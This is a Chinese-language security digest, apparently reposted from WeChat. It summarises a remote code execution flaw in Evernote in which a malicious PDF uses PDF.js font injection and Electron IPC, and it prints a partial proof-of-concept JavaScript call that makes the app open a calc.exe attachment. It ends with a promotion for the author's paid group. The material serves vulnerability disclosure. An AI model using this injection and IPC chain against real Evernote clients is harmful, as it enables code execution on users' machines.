Evernote 应用中PDF.js字体注入导致跨平台远程代码执行漏洞
2024-7-11 08:0:8 Author: mp.weixin.qq.com(查看原文) 阅读量:5 收藏

前言

一句话总结(点击原文跳转)

主要描述了一个在Evernote应用中发现的关键性漏洞,该漏洞可以通过嵌入恶意PDF文件到笔记中,利用PDF.js的字体注入进行JavaScript代码执行,进而通过Electron的ipcRenderer和BrokerBridge实现跨进程通信,最终达到远程代码执行(RCE)的攻击链。

关键信息点

//部分poc
window.top.electronApi.ipcRenderer.send('BrokerBridge', {action: 'Bridge/Call',id: '7e803824-d666-4ffe-9ebb-39ac1bd7856f',topics: 'boron.actions.openFileAttachment',data:{'resource': {'hash':'2f82623f9523c0d167862cad0eff6806','mime''application/octet-stream','rect': {'left'68,'top'155,'width'728.1428833007812,'height'43.42857360839844},'state''loaded','reference''22cad1af-d431-4af6-b818-0e34f9ff150b','selected'true,'url''en-cache://tokenKey%3D%22AuthToken%3AUser%3A245946624%22+f4cbd0d2-f670-52a7-7ea7-5720d65614fd+2f82623f9523c0d167862cad0eff6806+https://www.evernote.com/shard/s708/res/54938bad-ecb2-3aaa-6ad0-a9b7958d402f','isInk'false,'filesize'45056,'filename''calc.exe'},'url':'en-cache://tokenKey%3D%22AuthToken%3AUser%3A245946624%22+f4cbd0d2-f670-52a7-7ea7-5720d65614fd+2f82623f9523c0d167862cad0eff6806+https://www.evernote.com/shard/s708/res/54938bad-ecb2-3aaa-6ad0-a9b7958d402f','noteGuid''f4cbd0d2-f670-52a7-7ea7-5720d65614fd','appName'''}})

某知名安全大V,昨日印象笔记被黑

延伸阅读

最近的小玩意

  • AI重构安全热点
  • Ai重构知识库+智能书签+导航

  • 花费, 周均一亿多token

  • 自动化输出方式(快讯星球+微博)
部分能力后期会开放,比如知识库/迪斯科等,星球身份应该是后期各服务的通行证
AI目前比较贵,为了可持续发展,设置了星球的地板价25元(系统最低价)

  • 沟通群(过期添加red4blue,备注加群)

文章来源: https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&mid=2247487332&idx=1&sn=71b33d61aa38bffd24ebc8ac825b419f&chksm=fb35a6accc422fba335f182f00cbee272bda30d7f6ffffb543c22fa3ac8eea0852d5e73bc6d0&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh